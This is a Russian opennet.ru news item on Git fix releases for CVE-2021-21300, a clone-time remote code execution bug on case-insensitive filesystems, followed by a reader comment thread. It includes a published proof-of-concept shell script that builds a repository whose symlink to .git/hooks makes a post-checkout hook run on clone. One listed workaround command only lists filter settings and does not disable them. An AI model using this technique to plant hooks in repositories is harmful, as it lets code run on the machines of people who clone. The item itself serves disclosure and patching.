Обновление Git с устранением уязвимости, допускающей удалённое выполнение кода

09.03.2021 22:42

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.30.2, 2.17.6, 2.18.5, 2.19.6, 2.20.5, 2.21.4, 2.22.5, 2.23.4, 2.24.4, 2.25.5, 2.26.3, 2.27.1, 2.28.1 и 2.29.3, в которых устранена уязвимость (CVE-2021-21300), позволяющая организовать удалённое выполнение кода при клонировании репозитория злоумышленника с использованием команды "git clone". Уязвимости подвержены все выпуски Git, начиная с версии 2.15.

Проблема проявляется при использовании отложенных операций checkout, которые применяются в некоторых фильтрах очистки, например, настраиваемых в Git LFS. Эксплуатация уязвимости возможна только в файловых системах, не различающих регистр символов, но поддерживающих символические ссылки, таких как NTFS, HFS+ и APFS (т.е. на платформах Windows и macOS).

В качестве обходного пути защиты можно отключить в git обработку символических ссылок, выполнив "git config --global core.symlinks false", или отключить поддержку процессов-фильтров при помощи команды "git config --show-scope --get-regexp 'filter\..*\.process'". Также рекомендуется избегать клонирования непроверенных репозиториев.

Дополнение: Опубликован прототип эксплоита:



#!/bin/sh

  git init delayed-checkout &&
  (
  	cd delayed-checkout &&
  	echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
  		>.gitattributes &&
  	mkdir A &&
  	printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
  	chmod +x A/post-checkout &&
  	>A/a &&
  	>A/b &&
  	git add -A &&
  	rm -rf A &&
  	ln -s .git/hooks a &&
  	git add a &&
  	git commit -m initial
  ) &&
  git clone delayed-checkout cloned

исправить +16 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/54730-git

Ключевые слова: git

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (38)

1.1, Аноним (1), 22:56, 09/03/2021 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ] [к модератору]	+3 +/–

2.5, zzz (??), 23:36, 09/03/2021 Скрыто ботом-модератором [к модератору]	+2 +/–

3.6, Аноним (6), 23:40, 09/03/2021 Скрыто ботом-модератором [к модератору]	+4 +/–

4.14, zzz (??), 23:54, 09/03/2021 Скрыто ботом-модератором [к модератору]	+5 +/–

5.24, Аноним (-), 03:38, 10/03/2021 Скрыто ботом-модератором [к модератору]	–2 +/–

6.31, lovewindowd (?), 06:38, 10/03/2021 Скрыто ботом-модератором [к модератору]	+/–

2.8, Anonymousqwe (?), 23:42, 09/03/2021 Скрыто ботом-модератором [к модератору]	+/–

3.25, Аноним (25), 03:44, 10/03/2021 Скрыто ботом-модератором [к модератору]	–1 +/–

4.28, Anonymousqwe (?), 04:20, 10/03/2021 Скрыто ботом-модератором [к модератору]	+2 +/–

2.17, Аноним (17), 00:29, 10/03/2021 Скрыто ботом-модератором [к модератору]	–3 +/–

....ответы скрыты (9)

1.3, Аноним (3), 23:13, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Так вроде же NTFS сама по себе регистрозависимая, а вот нелепая надстройка над ней- нет

2.20, commiethebeastie (ok), 01:46, 10/03/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Даже FAT32 регистрозависимая. Есть же фокус, создаешь под линуксом две директории с одинаковым названием и в венде обе директории открывают какую-либо одну.

2.26, Аноним (25), 03:46, 10/03/2021 [^] [^^] [^^^] [ответить]	+/–
> Так вроде же NTFS сама по себе регистрозависимая, а вот нелепая надстройка > над ней- нет Ну так совместимость же. С MSDOS и WIN95, трололо. Скажите спасибо что хоть не 8.3 :)

3.33, Аноним (33), 09:48, 10/03/2021 [^] [^^] [^^^] [ответить]	+2 +/–
Формат 8.3 по сей день "основной" в FAT. LFN оформлены как отдельные записи в директории со специальным сочетанием атрибутов, некорректным для MS-DOS.

3.38, commiethebeastie (ok), 11:43, 10/03/2021 [^] [^^] [^^^] [ответить]	+/–
>> Так вроде же NTFS сама по себе регистрозависимая, а вот нелепая надстройка >> над ней- нет > Ну так совместимость же. С MSDOS и WIN95, трололо. Скажите спасибо что > хоть не 8.3 :) Причем тут короткие имена файлов? Создаешь под линуксом на FAT32 устройстве два каталога Folder и folder и кладешь туда разные файлы и о чудо, под линуксом они работают. Открываешь под вендой, видишь 2 каталога, но приводят они в один.

4.42, nuclight (??), 14:38, 10/03/2021 [^] [^^] [^^^] [ответить]	–3 +/–
И кто сказал, что линуксовая реализация в этом месте не нарушает стандарт?

5.44, Аноним (44), 17:11, 10/03/2021 [^] [^^] [^^^] [ответить]	+/–
а должна?

2.37, Аноним (37), 11:25, 10/03/2021 [^] [^^] [^^^] [ответить]	+/–
Насколько я помню, это сама NTFS может быть регистрозависимой или нет, в т.ч. на уровне директории.

2.46, Тот_Самый_Анонимус (?), 08:34, 17/03/2021 [^] [^^] [^^^] [ответить]	+/–
Она регистронезависимая. Регистрозависим виндовый драйвер.

1.9, Аноним (9), 23:46, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
Недавно же клонирование уже фиксили... Сколько там ещё уязвимостей осталось?

Часть нити удалена модератором

3.16, Annoynymous (ok), 00:25, 10/03/2021 [^] [^^] [^^^] [ответить]	–1 +/–
Эксплуатация уязвимости возможна только в файловых системах, не различающих регистр символов, но поддерживающих символические ссылки, таких как NTFS, HFS+ и APFS (т.е. на платформах Windows и macOS).

4.19, Anonymousqwe (?), 00:49, 10/03/2021 [^] [^^] [^^^] [ответить]	–1 +/–
Но баг же не связан с файловой системой. А Гит пишут люди использующие Линукс

5.29, hefenud (ok), 04:40, 10/03/2021 [^] [^^] [^^^] [ответить]	+3 +/–
А еше эти люди едят огурцы. Я думаю, что виноваты огурцы.

5.40, Бывалый (?), 13:49, 10/03/2021 [^] [^^] [^^^] [ответить]	+1 +/–
> пишут люди Вот где самая мякотка

4.23, zzz (??), 03:34, 10/03/2021 [^] [^^] [^^^] [ответить]	+3 +/–
Баг не в ФС, а в гит.

1.18, Аноним (18), 00:39, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
> Git 2.30.2, 2.17.6, 2.18.5, 2.19.6, 2.20.5, 2.21.4, 2.22.5, 2.23.4, 2.24.4, 2.25.5, 2.26.3, 2.27.1, 2.28.1 и 2.29.3 Ставить все сразу.

1.21, Аноним (21), 01:49, 10/03/2021 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ] [к модератору]	+/–

2.22, Аноним (3), 02:03, 10/03/2021 Скрыто ботом-модератором [к модератору]	–1 +/–

2.27, Аноним (25), 03:47, 10/03/2021 Скрыто ботом-модератором [к модератору]	+2 +/–

3.35, Michael Shigorin (ok), 09:57, 10/03/2021 Скрыто ботом-модератором [к модератору]	+/–

2.30, kissmyass (?), 06:07, 10/03/2021 Скрыто ботом-модератором [к модератору]	+/–

....ответы скрыты (4)

1.32, Бывалый (?), 09:24, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
> рекомендуется избегать клонирования непроверенных репозиториев Да как же их проверить если клонировать нельзя!

2.34, Аноним (34), 09:55, 10/03/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Смотреть но не трогать.

1.36, Аноним (36), 10:26, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]	–9 +/–
наглядный пример того, к чему приводит использование устаревшего Си

2.41, ford1813 (ok), 14:05, 10/03/2021 [^] [^^] [^^^] [ответить]	+5 +/–
Наглядный пример того, что некоторые кроме заголовка ничего не читают.

1.39, Аноним (39), 13:28, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Хорошо что я пользуюсь SVN!

1.43, Аноним (43), 15:43, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
> Эксплуатация уязвимости возможна только в файловых системах, не различающих регистр символов, но поддерживающих символические ссылки, таких как NTFS, HFS+ и APFS (т.е. на платформах Windows и macOS). А так же на ext4 при использовании новомодных опций.

2.45, Аноним (45), 07:25, 11/03/2021 [^] [^^] [^^^] [ответить]	+/–
case-insensitive режим в ext4 включается выборочно для отдельных директорий. Трудно представить себе ситуацию, когда кто-то в здравом уме переключит ext4 в case-insensitive для директории с git.

игнорирование участников | лог модерирования

Добавить комментарий

Текст: